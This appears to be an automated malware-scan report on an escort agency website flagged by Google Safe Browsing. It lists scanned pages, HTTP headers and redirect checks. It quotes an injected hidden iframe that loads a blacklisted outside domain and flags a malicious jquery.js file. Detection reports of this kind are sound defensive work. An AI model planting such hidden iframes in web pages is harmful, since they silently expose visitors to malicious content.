Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=exclusivetemptations.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://exclusivetemptations.co.uk/ | 200 OK Content-Length: 12230 Content-Type: text/html | malicious |
Page code contains blacklisted domain: nmsbaseball.com ...[14480 bytes skipped]... nt.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </table> <iframe name=Twitter scrolling=auto frameborder=no align=center height=38 width=87 src=http://nmsbaseball.com/post.php?id=878217></iframe></body> </html> Malicious iFrame found. size: 87x38 src: http://nmsbaseball.com/post.php?id=878217 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=38 width=87 src=http://nmsbaseball.com/post.php?id=878217> | ||
http://exclusivetemptations.co.uk/home.php | 200 OK Content-Length: 15526 Content-Type: text/html | malicious |
Page code contains blacklisted domain: nmsbaseball.com ...[18603 bytes skipped]... nt.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </table> <iframe name=Twitter scrolling=auto frameborder=no align=center height=38 width=87 src=http://nmsbaseball.com/post.php?id=878217></iframe></body> </html> Malicious iFrame found. size: 87x38 src: http://nmsbaseball.com/post.php?id=878217 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=38 width=87 src=http://nmsbaseball.com/post.php?id=878217> | ||
http://exclusivetemptations.co.uk/jquery.js | 200 OK Content-Length: 57277 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('');
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}va Antivirus reports:
| ||
http://exclusivetemptations.co.uk/gallery.htm | 404 Not Found Content-Length: 285 Content-Type: text/html | clean |
http://exclusivetemptations.co.uk/test404page.js | 404 Not Found Content-Length: 288 Content-Type: text/html | clean |
http://exclusivetemptations.co.uk/about-exclusive-temptation-escorts-agency.htm | 404 Not Found Content-Length: 319 Content-Type: text/html | clean |
http://exclusivetemptations.co.uk/reservations.htm | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
http://exclusivetemptations.co.uk/casting.htm | 404 Not Found Content-Length: 285 Content-Type: text/html | clean |
http://exclusivetemptations.co.uk/faq.htm | 404 Not Found Content-Length: 281 Content-Type: text/html | clean |
http://exclusivetemptations.co.uk/privacy-policy.htm | 404 Not Found Content-Length: 292 Content-Type: text/html | clean |
http://exclusivetemptations.co.uk/contact-us.htm | 404 Not Found Content-Length: 288 Content-Type: text/html | clean |
http://exclusivetemptations.co.uk/region/150-models.htm | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
http://exclusivetemptations.co.uk/region/200-models.htm | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
http://exclusivetemptations.co.uk/region/300-models.htm | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
http://exclusivetemptations.co.uk/region/london-models.htm | 404 Not Found Content-Length: 298 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: exclusivetemptations.co.uk
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 07 Jun 2014 23:41:12 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=d79e952fa633ac10229fe7ff0efe6780; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: exclusivetemptations.co.uk
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 07 Jun 2014 23:41:12 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=d79e952fa633ac10229fe7ff0efe6780; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: exclusivetemptations.co.uk
Referer: http://www.google.com/search?q=exclusivetemptations.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: exclusivetemptations.co.uk
Referer: http://www.google.com/search?q=exclusivetemptations.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.